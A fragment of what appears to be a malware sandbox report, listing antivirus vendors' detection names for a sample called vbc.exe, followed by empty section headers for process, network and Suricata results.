TrendMicro	TROJ_GEN.R06CC0PHA21
McAfee-GW-Edition	BehavesLike.Win32.PUPXBX.jc
Sophos	Mal/Generic-S
Webroot	W32.Malware.Gen
Gridinsoft	Trojan.Heur!.02212121
Microsoft	Trojan:Script/Phonzy.C!ml
Cynet	Malicious (score: 100)
MAX	malware (ai score=82)
VBA32	TrojanDownloader.Agent
TrendMicro-HouseCall	TROJ_GEN.R06CC0PHA21
SentinelOne	Static AI - Suspicious PE
eGambit	Unsafe.AI_Score_99%
Fortinet	W32/Kryptik.EPXQ!tr
MaxSecure	Trojan.Malware.300983.susgen
AVG	Win32:Trojan-gen
CrowdStrike	win/malicious_confidence_100% (W)

vbc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All